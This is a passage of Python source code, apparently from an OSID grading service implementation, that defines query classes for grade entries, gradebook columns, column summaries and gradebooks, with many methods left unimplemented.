*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_time_graded_terms(self):
"""Clears the time graded terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
time_graded_terms = property(fdel=clear_time_graded_terms)
@utilities.arguments_not_none
def match_grader_id(self, resource_id, match):
"""Sets the agent ``Id`` for this query.
arg: resource_id (osid.id.Id): a resource ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``resource_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_avatar_id
self._add_match('graderId', str(resource_id), match)
def clear_grader_id_terms(self):
"""Clears the grader ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
self._clear_terms('graderId')
grader_id_terms = property(fdel=clear_grader_id_terms)
def supports_grader_query(self):
"""Tests if a ``ResourceQuery`` is available for querying graders.
return: (boolean) - ``true`` if a resource query is available,
``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_grader_query(self):
"""Gets the query for an agent.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.resource.ResourceQuery) - the resource query
raise: Unimplemented - ``supports_resource_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_resource_query()`` is ``true``.*
"""
raise errors.Unimplemented()
grader_query = property(fget=get_grader_query)
@utilities.arguments_not_none
def match_any_grader(self, match):
"""Matches grade entries with any grader.
arg: match (boolean): ``true`` to match grade entries with
any grader, ``false`` to match entries with no grader
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_grader_terms(self):
"""Clears the grader terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
grader_terms = property(fdel=clear_grader_terms)
@utilities.arguments_not_none
def match_grading_agent_id(self, agent_id, match):
"""Sets the grading agent ``Id`` for this query.
arg: agent_id (osid.id.Id): an agent ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``agent_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_avatar_id
self._add_match('gradingAgentId', str(agent_id), match)
def clear_grading_agent_id_terms(self):
"""Clears the grader ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
self._clear_terms('gradingAgentId')
grading_agent_id_terms = property(fdel=clear_grading_agent_id_terms)
def supports_grading_agent_query(self):
"""Tests if an ``AgentQuery`` is available for querying grading agents.
return: (boolean) - ``true`` if an agent query is available,
``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_grading_agent_query(self):
"""Gets the query for an agent.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.authentication.AgentQuery) - the agent query
raise: Unimplemented - ``supports_grading_agent_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_grading_agent_query()`` is ``true``.*
"""
raise errors.Unimplemented()
grading_agent_query = property(fget=get_grading_agent_query)
@utilities.arguments_not_none
def match_any_grading_agent(self, match):
"""Matches grade entries with any grading agent.
arg: match (boolean): ``true`` to match grade entries with
any grading agent, ``false`` to match entries with no
grading agent
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_grading_agent_terms(self):
"""Clears the grading agent terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
grading_agent_terms = property(fdel=clear_grading_agent_terms)
@utilities.arguments_not_none
def match_gradebook_id(self, gradebook_id, match):
"""Sets the gradebook ``Id`` for this query.
arg: gradebook_id (osid.id.Id): a gradebook ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``gradebook_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_bin_id
self._add_match('assignedGradebookIds', str(gradebook_id), match)
def clear_gradebook_id_terms(self):
"""Clears the gradebook ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_bin_id_terms
self._clear_terms('assignedGradebookIds')
gradebook_id_terms = property(fdel=clear_gradebook_id_terms)
def supports_gradebook_query(self):
"""Tests if a ``GradebookQuery`` is available for querying resources.
return: (boolean) - ``true`` if a gradebook query is available,
``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_gradebook_query(self):
"""Gets the query for a gradebook.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradebookQuery) - the gradebook query
raise: Unimplemented - ``supports_gradebook_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_gradebook_query()`` is ``true``.*
"""
raise errors.Unimplemented()
gradebook_query = property(fget=get_gradebook_query)
def clear_gradebook_terms(self):
"""Clears the gradebook terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('gradebook')
gradebook_terms = property(fdel=clear_gradebook_terms)
@utilities.arguments_not_none
def get_grade_entry_query_record(self, grade_entry_record_type):
"""Gets the grade entry query record corresponding to the given ``GradeEntry`` record ``Type``.
Multiple retrievals produce a nested ``OR`` term.
arg: grade_entry_record_type (osid.type.Type): a grade entry
record type
return: (osid.grading.records.GradeEntryQueryRecord) - the grade
entry query record
raise: NullArgument - ``grade_entry_record_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: Unsupported -
``has_record_type(grade_entry_record_type)`` is
``false``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
class GradebookColumnQuery(abc_grading_queries.GradebookColumnQuery, osid_queries.OsidObjectQuery):
"""This is the query for searching gradings.
Each method match request produces an ``AND`` term while multiple
invocations of a method produces a nested ``OR``.
"""
def __init__(self, runtime):
self._namespace = 'grading.GradebookColumn'
self._runtime = runtime
record_type_data_sets = get_registry('GRADEBOOK_COLUMN_RECORD_TYPES', runtime)
self._all_supported_record_type_data_sets = record_type_data_sets
self._all_supported_record_type_ids = []
for data_set in record_type_data_sets:
self._all_supported_record_type_ids.append(str(Id(**record_type_data_sets[data_set])))
osid_queries.OsidObjectQuery.__init__(self, runtime)
@utilities.arguments_not_none
def match_grade_system_id(self, grade_system_id, match):
"""Sets the grade system ``Id`` for this query.
arg: grade_system_id (osid.id.Id): a grade system ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``grade_system_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
self._add_match('gradeSystemId', str(grade_system_id), bool(match))
def clear_grade_system_id_terms(self):
"""Clears the grade system ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
self._clear_terms('gradeSystemId')
grade_system_id_terms = property(fdel=clear_grade_system_id_terms)
def supports_grade_system_query(self):
"""Tests if a ``GradeSystemQuery`` is available for querying grade systems.
return: (boolean) - ``true`` if a grade system query is
available, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_grade_system_query(self):
"""Gets the query for a grade system.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradeSystemQuery) - the grade system query
raise: Unimplemented - ``supports_grade_system_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_grade_system_query()`` is ``true``.*
"""
raise errors.Unimplemented()
grade_system_query = property(fget=get_grade_system_query)
@utilities.arguments_not_none
def match_any_grade_system(self, match):
"""Matches gradebook columns with any grade system assigned.
arg: match (boolean): ``true`` to match columns with any
grade system, ``false`` to match columns with no grade
system
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_grade_system_terms(self):
"""Clears the grade system terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('gradeSystem')
grade_system_terms = property(fdel=clear_grade_system_terms)
@utilities.arguments_not_none
def match_grade_entry_id(self, grade_entry_id, match):
"""Sets the grade entry ``Id`` for this query.
arg: grade_entry_id (osid.id.Id): a grade entry ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``grade_entry_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_avatar_id
self._add_match('gradeEntryId', str(grade_entry_id), match)
def clear_grade_entry_id_terms(self):
"""Clears the grade entry ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
self._clear_terms('gradeEntryId')
grade_entry_id_terms = property(fdel=clear_grade_entry_id_terms)
def supports_grade_entry_query(self):
"""Tests if a ``GradeEntryQuery`` is available for querying grade entries.
return: (boolean) - ``true`` if a grade entry query is
available, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_grade_entry_query(self):
"""Gets the query for a grade entry.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradeEntryQuery) - the grade entry query
raise: Unimplemented - ``supports_grade_entry_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_grade_entry_query()`` is ``true``.*
"""
raise errors.Unimplemented()
grade_entry_query = property(fget=get_grade_entry_query)
@utilities.arguments_not_none
def match_any_grade_entry(self, match):
"""Matches gradebook columns with any grade entry assigned.
arg: match (boolean): ``true`` to match columns with any
grade entry, ``false`` to match columns with no grade
entries
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_grade_entry_terms(self):
"""Clears the grade entry terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
grade_entry_terms = property(fdel=clear_grade_entry_terms)
def supports_gradebook_column_summary_query(self):
"""Tests if a ``GradebookColumnSummaryQuery`` is available for querying grade systems.
return: (boolean) - ``true`` if a gradebook column summary query
interface is available, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_gradebook_column_summary_query(self):
"""Gets the query interface for a gradebook column summary.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradebookColumnSummaryQuery) - the
gradebook column summary query
raise: Unimplemented -
``supports_gradebook_column_summary_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_gradebook_column_summary_query()`` is ``true``.*
"""
raise errors.Unimplemented()
gradebook_column_summary_query = property(fget=get_gradebook_column_summary_query)
def clear_gradebook_column_summary_terms(self):
"""Clears the gradebook column summary terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
gradebook_column_summary_terms = property(fdel=clear_gradebook_column_summary_terms)
@utilities.arguments_not_none
def match_gradebook_id(self, gradebook_id, match):
"""Sets the gradebook ``Id`` for this query.
arg: gradebook_id (osid.id.Id): a gradebook ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``gradebook_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_bin_id
self._add_match('assignedGradebookIds', str(gradebook_id), match)
def clear_gradebook_id_terms(self):
"""Clears the gradebook ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_bin_id_terms
self._clear_terms('assignedGradebookIds')
gradebook_id_terms = property(fdel=clear_gradebook_id_terms)
def supports_gradebook_query(self):
"""Tests if a ``GradebookQuery`` is available for querying grade systems.
return: (boolean) - ``true`` if a gradebook query interface is
available, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_gradebook_query(self):
"""Gets the query interface for a gradebook.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradebookQuery) - the gradebook query
raise: Unimplemented - ``supports_gradebook_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_gradebook_query()`` is ``true``.*
"""
raise errors.Unimplemented()
gradebook_query = property(fget=get_gradebook_query)
def clear_gradebook_terms(self):
"""Clears the gradebook terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('gradebook')
gradebook_terms = property(fdel=clear_gradebook_terms)
@utilities.arguments_not_none
def get_gradebook_column_query_record(self, gradebook_column_record_type):
"""Gets the gradebook column query record corresponding to the given ``GradebookColumn`` record ``Type``.
Multiple retrievals produce a nested ``OR`` term.
arg: gradebook_column_record_type (osid.type.Type): a
gradebook column record type
return: (osid.grading.records.GradebookColumnQueryRecord) - the
gradebook column query record
raise: NullArgument - ``gradebook_column_record_type`` is
``null``
raise: OperationFailed - unable to complete request
raise: Unsupported -
``has_record_type(gradebook_column_record_type)`` is
``false``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
class GradebookColumnSummaryQuery(abc_grading_queries.GradebookColumnSummaryQuery, osid_queries.OsidRuleQuery):
"""This is the query for searching gradebook column summaries.
Each method match request produces an ``AND`` term while multiple
invocations of a method produces a nested ``OR``.
"""
def __init__(self, runtime):
self._namespace = 'grading.GradebookColumnSummaryQuery'
self._runtime = runtime
record_type_data_sets = get_registry('GRADEBOOK_COLUMN_SUMMARY_QUERY_RECORD_TYPES', runtime)
self._all_supported_record_type_data_sets = record_type_data_sets
self._all_supported_record_type_ids = []
for data_set in record_type_data_sets:
self._all_supported_record_type_ids.append(str(Id(**record_type_data_sets[data_set])))
osid_queries.OsidRuleQuery.__init__(self, runtime)
@utilities.arguments_not_none
def match_gradebook_column_id(self, gradebook_column_id, match):
"""Sets the gradebook column ``Id`` for this query.
arg: gradebook_column_id (osid.id.Id): a gradebook column
``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``gradebook_column_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_gradebook_column_id_terms(self):
"""Clears the gradebook column ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
gradebook_column_id_terms = property(fdel=clear_gradebook_column_id_terms)
def supports_gradebook_column_query(self):
"""Tests if a ``GradebookColumnQuery`` is available for querying gradebook column.
return: (boolean) - ``true`` if a gradebook column query is
available, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_gradebook_column_query(self):
"""Gets the query for a gradebook column.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradebookColumnQuery) - the gradebook
column query
raise: Unimplemented - ``supports_gradebook_column_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_gradebook_column_query()`` is ``true``.*
"""
raise errors.Unimplemented()
gradebook_column_query = property(fget=get_gradebook_column_query)
@utilities.arguments_not_none
def match_any_gradebook_column(self, match):
"""Matches gradebook column derivations with any gradebookc olumn.
arg: match (boolean): ``true`` to match gradebook column
derivations with any gradebook column, ``false`` to
match gradebook column derivations with no gradebook
columns
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_gradebook_column_terms(self):
"""Clears the source grade system terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
gradebook_column_terms = property(fdel=clear_gradebook_column_terms)
@utilities.arguments_not_none
def match_mean(self, low, high, match):
"""Matches a mean between the given values inclusive.
arg: low (decimal): low end of range
arg: high (decimal): high end of range
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: InvalidArgument - ``low`` is greater than ``high``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_mean_terms(self):
"""Clears the mean terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
mean_terms = property(fdel=clear_mean_terms)
@utilities.arguments_not_none
def match_minimum_mean(self, value, match):
"""Matches a mean greater than or equal to the given value.
arg: value (decimal): minimum value
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_minimum_mean_terms(self):
"""Clears the minimum mean terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
minimum_mean_terms = property(fdel=clear_minimum_mean_terms)
@utilities.arguments_not_none
def match_median(self, low, high, match):
"""Matches a median between the given values inclusive.
arg: low (decimal): low end of range
arg: high (decimal): high end of range
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: InvalidArgument - ``low`` is greater than ``high``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_median_terms(self):
"""Clears the median terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
median_terms = property(fdel=clear_median_terms)
@utilities.arguments_not_none
def match_minimum_median(self, value, match):
"""Matches a median greater than or equal to the given value.
arg: value (decimal): minimum value
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_minimum_median_terms(self):
"""Clears the minimum median terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
minimum_median_terms = property(fdel=clear_minimum_median_terms)
@utilities.arguments_not_none
def match_mode(self, low, high, match):
"""Matches a mode between the given values inclusive.
arg: low (decimal): low end of range
arg: high (decimal): high end of range
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: InvalidArgument - ``low`` is greater than ``high``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_mode_terms(self):
"""Clears the mode terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
mode_terms = property(fdel=clear_mode_terms)
@utilities.arguments_not_none
def match_minimum_mode(self, value, match):
"""Matches a mode greater than or equal to the given value.
arg: value (decimal): minimum value
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_minimum_mode_terms(self):
"""Clears the minimum mode terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
minimum_mode_terms = property(fdel=clear_minimum_mode_terms)
@utilities.arguments_not_none
def match_rms(self, low, high, match):
"""Matches a root mean square between the given values inclusive.
arg: low (decimal): low end of range
arg: high (decimal): high end of range
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: InvalidArgument - ``low`` is greater than ``high``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_rms_terms(self):
"""Clears the root mean square terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
rms_terms = property(fdel=clear_rms_terms)
@utilities.arguments_not_none
def match_minimum_rms(self, value, match):
"""Matches a root mean square greater than or equal to the given value.
arg: value (decimal): minimum value
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_minimum_rms_terms(self):
"""Clears the minimum RMS terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
minimum_rms_terms = property(fdel=clear_minimum_rms_terms)
@utilities.arguments_not_none
def match_standard_deviation(self, low, high, match):
"""Matches a standard deviation mean square between the given values inclusive.
arg: low (decimal): low end of range
arg: high (decimal): high end of range
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: InvalidArgument - ``low`` is greater than ``high``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_standard_deviation_terms(self):
"""Clears the standard deviation terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
standard_deviation_terms = property(fdel=clear_standard_deviation_terms)
@utilities.arguments_not_none
def match_minimum_standard_deviation(self, value, match):
"""Matches a standard deviation greater than or equal to the given value.
arg: value (decimal): minimum value
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_minimum_standard_deviation_terms(self):
"""Clears the minimum standard deviation terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
minimum_standard_deviation_terms = property(fdel=clear_minimum_standard_deviation_terms)
@utilities.arguments_not_none
def match_sum(self, low, high, match):
"""Matches a sum mean square between the given values inclusive.
arg: low (decimal): low end of range
arg: high (decimal): high end of range
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: InvalidArgument - ``low`` is greater than ``high``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_sum_terms(self):
"""Clears the sum terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
sum_terms = property(fdel=clear_sum_terms)
@utilities.arguments_not_none
def match_minimum_sum(self, value, match):
"""Matches a sum greater than or equal to the given value.
arg: value (decimal): minimum value
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_minimum_sum_terms(self):
"""Clears the minimum sum terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
minimum_sum_terms = property(fdel=clear_minimum_sum_terms)
@utilities.arguments_not_none
def match_gradebook_id(self, gradebook_id, match):
"""Sets the gradebook ``Id`` for this query.
arg: gradebook_id (osid.id.Id): a gradebook ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``gradebook_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_gradebook_id_terms(self):
"""Clears the gradebook ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
gradebook_id_terms = property(fdel=clear_gradebook_id_terms)
def supports_gradebook_query(self):
"""Tests if a ``GradebookQuery`` is available.
return: (boolean) - ``true`` if a gradebook query is available,
``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_gradebook_query(self):
"""Gets the query for a gradebook.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradebookQuery) - the gradebook query
raise: Unimplemented - ``supports_gradebook_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_gradebook_query()`` is ``true``.*
"""
raise errors.Unimplemented()
gradebook_query = property(fget=get_gradebook_query)
def clear_gradebook_terms(self):
"""Clears the gradebook terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
gradebook_terms = property(fdel=clear_gradebook_terms)
@utilities.arguments_not_none
def get_gradebook_column_summary_query_record(self, gradebook_column_summary_record_type):
"""Gets the gradebook column summary query record corresponding to the given ``GradebookColumnSummary`` record ``Type``.
Multiple retrievals produce a nested ``OR`` term.
arg: gradebook_column_summary_record_type (osid.type.Type): a
gradebook column summary record type
return: (osid.grading.records.GradebookColumnSummaryQueryRecord)
- the gradebook column summary query record
raise: NullArgument - ``gradebook_column_summary_record_type``
is ``null``
raise: OperationFailed - unable to complete request
raise: Unsupported -
``has_record_type(gradebook_column_summary_record_type)``
is ``false``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
class GradebookQuery(abc_grading_queries.GradebookQuery, osid_queries.OsidCatalogQuery):
"""This is the query for searching gradebooks.
Each method specifies an ``AND`` term while multiple invocations of
the same method produce a nested ``OR``.
"""
def __init__(self, runtime):
self._runtime = runtime
record_type_data_sets = get_registry('GRADEBOOK_RECORD_TYPES', runtime)
self._all_supported_record_type_data_sets = record_type_data_sets
self._all_supported_record_type_ids = []
for data_set in record_type_data_sets:
self._all_supported_record_type_ids.append(str(Id(**record_type_data_sets[data_set])))
osid_queries.OsidCatalogQuery.__init__(self, runtime)
def _get_descendant_catalog_ids(self, catalog_id):
hm = self._get_provider_manager('HIERARCHY')
hts = hm.get_hierarchy_traversal_session_for_hierarchy(
Id(authority='GRADING',
namespace='CATALOG',
identifier='GRADEBOOK')
) # What about the Proxy?
descendants = []
if hts.has_children(catalog_id):
for child_id in hts.get_children(catalog_id):
descendants += list(self._get_descendant_catalog_ids(child_id))
descendants.append(child_id)
return IdList(descendants)
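# Note: the helper above recurses depth-first through the gradebook hierarchy
# obtained from the HIERARCHY provider, flattening every Id underneath
# catalog_id into a single IdList.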
@utilities.arguments_not_none
def match_grade_system_id(self, grade_system_id, match):
"""Sets the grade system ``Id`` for this query.
arg: grade_system_id (osid.id.Id): a grade system ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``grade_system_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_grade_system_id_terms(self):
"""Clears the grade system ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
self._clear_terms('gradeSystemId')
grade_system_id_terms = property(fdel=clear_grade_system_id_terms)
def supports_grade_system_query(self):
"""Tests if a ``GradeSystemQuery`` is available.
return: (boolean) - ``true`` if a grade system query is
available, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_grade_system_query(self):
"""Gets the query for a grade system.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradeSystemQuery) - the grade system query
raise: Unimplemented - ``supports_grade_system_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_grade_system_query()`` is ``true``.*
"""
raise errors.Unimplemented()
grade_system_query = property(fget=get_grade_system_query)
@utilities.arguments_not_none
def match_any_grade_system(self, match):
"""Matches gradebooks that have any grade system.
arg: match (boolean): ``true`` to match gradebooks with any
grade system, ``false`` to match gradebooks with no
grade system
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_grade_system_terms(self):
"""Clears the grade system terms.
*compliance: mandatory -- This method must be implemented.*
"""
self._clear_terms('gradeSystem')
grade_system_terms = property(fdel=clear_grade_system_terms)
@utilities.arguments_not_none
def match_grade_entry_id(self, grade_entry_id, match):
"""Sets the grade entry ``Id`` for this query.
arg: grade_entry_id (osid.id.Id): a grade entry ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``grade_entry_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_grade_entry_id_terms(self):
"""Clears the grade entry ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
self._clear_terms('gradeEntryId')
grade_entry_id_terms = property(fdel=clear_grade_entry_id_terms)
def supports_grade_entry_query(self):
"""Tests if a ``GradeEntryQuery`` is available.
return: (boolean) - ``true`` if a grade entry query is
available, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_grade_entry_query(self):
"""Gets the query for a grade entry.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradeEntryQuery) - the grade entry query
raise: Unimplemented - ``supports_grade_entry_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_grade_entry_query()`` is ``true``.*
"""
raise errors.Unimplemented()
grade_entry_query = property(fget=get_grade_entry_query)
@utilities.arguments_not_none
def match_any_grade_entry(self, match):
"""Matches gradebooks that have any grade entry.
arg: match (boolean): ``true`` to match gradebooks with any
grade entry, ``false`` to match gradebooks with no grade
entry
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_grade_entry_terms(self):
"""Clears the grade entry terms.
*compliance: mandatory -- This method must be implemented.*
"""
self._clear_terms('gradeEntry')
grade_entry_terms = property(fdel=clear_grade_entry_terms)
@utilities.arguments_not_none
def match_gradebook_column_id(self, gradebook_column_id, match):
"""Sets the gradebook column ``Id`` for this query.
arg: gradebook_column_id (osid.id.Id): a gradebook column
``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``gradebook_column_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_gradebook_column_id_terms(self):
"""Clears the gradebook column ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
self._clear_terms('gradebookColumnId')
gradebook_column_id_terms = property(fdel=clear_gradebook_column_id_terms)
def supports_gradebook_column_query(self):
"""Tests if a ``GradebookColumnQuery`` is available.
return: (boolean) - ``true`` if a gradebook column query is
available, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_gradebook_column_query(self):
"""Gets the query for a gradebook column.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradebookColumnQuery) - the gradebook
column query
raise: Unimplemented - ``supports_gradebook_column_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_gradebook_column_query()`` is ``true``.*
"""
raise errors.Unimplemented()
gradebook_column_query = property(fget=get_gradebook_column_query)
@utilities.arguments_not_none
def match_any_gradebook_column(self, match):
"""Matches gradebooks that have any column.
arg: match (boolean): ``true`` to match gradebooks with any
column, ``false`` to match gradebooks with no column
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_gradebook_column_terms(self):
"""Clears the gradebook column terms.
*compliance: mandatory -- This method must be implemented.*
"""
self._clear_terms('gradebookColumn')
gradebook_column_terms = property(fdel=clear_gradebook_column_terms)
@utilities.arguments_not_none
def match_ancestor_gradebook_id(self, gradebook_id, match):
"""Sets the gradebook ``Id`` for this query to match gradebooks that have the specified gradebook as an ancestor.
arg: gradebook_id (osid.id.Id): a gradebook ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``gradebook_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_ancestor_gradebook_id_terms(self):
"""Clears the ancestor gradebook ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
self._clear_terms('ancestorGradebookId')
ancestor_gradebook_id_terms = property(fdel=clear_ancestor_gradebook_id_terms)
def supports_ancestor_gradebook_query(self):
